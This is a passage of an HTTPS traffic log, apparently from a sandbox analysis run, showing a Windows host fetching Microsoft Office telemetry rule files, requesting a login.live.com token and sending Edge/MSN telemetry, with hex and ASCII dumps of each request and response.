2024-11-11 23:06:32 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:32 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 63eb2b55-501e-00a3-51d5-33c0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230632Z-174f7845968xlwnmhC1EWR0sv800000005d000000000ehxg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:32 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.5	49960	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:32 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:32 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:32 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 27f4d8c4-701e-0032-2dd5-33a540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230632Z-174f7845968nxc96hC1EWRspw8000000057000000000smkw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:32 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	49959	40.126.32.68	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:32 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-11 23:06:32 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-11 23:06:33 UTC	653	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 11 Nov 2024 23:05:33 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.9 Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C539_SN1 x-ms-request-id: 4710b0d8-d1d8-4534-b72e-39616f9584c2 PPServer: PPV: 30 H: SN1PEPF0002F95A V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 11 Nov 2024 23:06:33 GMT Connection: close Content-Length: 11391
2024-11-11 23:06:33 UTC	11391	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.5	49967	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:33 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:33 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:33 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 7f4584eb-c01e-008e-75d5-337381000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230633Z-174f7845968j6t2phC1EWRcfe800000005rg00000000dba0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:33 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.5	49966	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:33 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:33 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:33 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 1c99ed40-601e-0097-39d5-33f33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230633Z-174f78459684bddphC1EWRbht4000000058000000000n8nk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:33 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.5	49968	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:33 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:33 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:33 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 5f7107d8-901e-0048-05d5-33b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230633Z-174f7845968frfdmhC1EWRxxbw00000005rg000000002ba3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:33 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.5	49969	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:33 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:33 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:33 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: c08ebcb6-401e-0064-7bd5-3354af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230633Z-174f7845968cpnpfhC1EWR3afc000000056000000000f434 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:33 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.5	49971	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:33 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:33 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:33 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 99a87d01-601e-005c-42d5-33f06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230633Z-174f7845968v79b7hC1EWRu01s000000057g000000009rfd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:33 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	49976	20.189.173.13	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	1044	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731366392616&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 11704 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-11 23:06:34 UTC	11704	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 31 54 32 33 3a 30 36 3a 33 32 2e 36 31 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 33 65 64 62 63 38 35 2d 37 37 31 63 2d 34 36 30 34 2d 39 62 30 37 2d 66 61 64 63 37 64 39 61 61 31 61 63 22 2c 22 65 70 6f 63 68 22 3a 22 32 32 35 30 35 36 34 39 30 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-11T23:06:32.614Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"53edbc85-771c-4604-9b07-fadc7d9aa1ac","epoch":"2250564903"},"app":{"locale
2024-11-11 23:06:34 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=2712410638484192be45f0beb5bc5706&HASH=2712&LV=202411&V=4&LU=1731366394555; Domain=.microsoft.com; Expires=Tue, 11 Nov 2025 23:06:34 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=2f294b598035493dbfb90ec4a13c5cd9; Domain=.microsoft.com; Expires=Mon, 11 Nov 2024 23:36:34 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1939 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 11 Nov 2024 23:06:34 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	49975	20.189.173.13	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	1043	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731366392619&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5082 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-11 23:06:34 UTC	5082	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 31 54 32 33 3a 30 36 3a 33 32 2e 36 31 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 33 65 64 62 63 38 35 2d 37 37 31 63 2d 34 36 30 34 2d 39 62 30 37 2d 66 61 64 63 37 64 39 61 61 31 61 63 22 2c 22 65 70 6f 63 68 22 3a 22 32 32 35 30 35 36 34 39 30 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-11T23:06:32.618Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"53edbc85-771c-4604-9b07-fadc7d9aa1ac","epoch":"2250564903"},"app":{"locale
2024-11-11 23:06:34 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=804064116e4a42e99aa222d0c001212f&HASH=8040&LV=202411&V=4&LU=1731366394444; Domain=.microsoft.com; Expires=Tue, 11 Nov 2025 23:06:34 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=482a777882ac4257be77cdcd5bdd295a; Domain=.microsoft.com; Expires=Mon, 11 Nov 2024 23:36:34 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1825 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 11 Nov 2024 23:06:34 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.5	49985	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:34 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
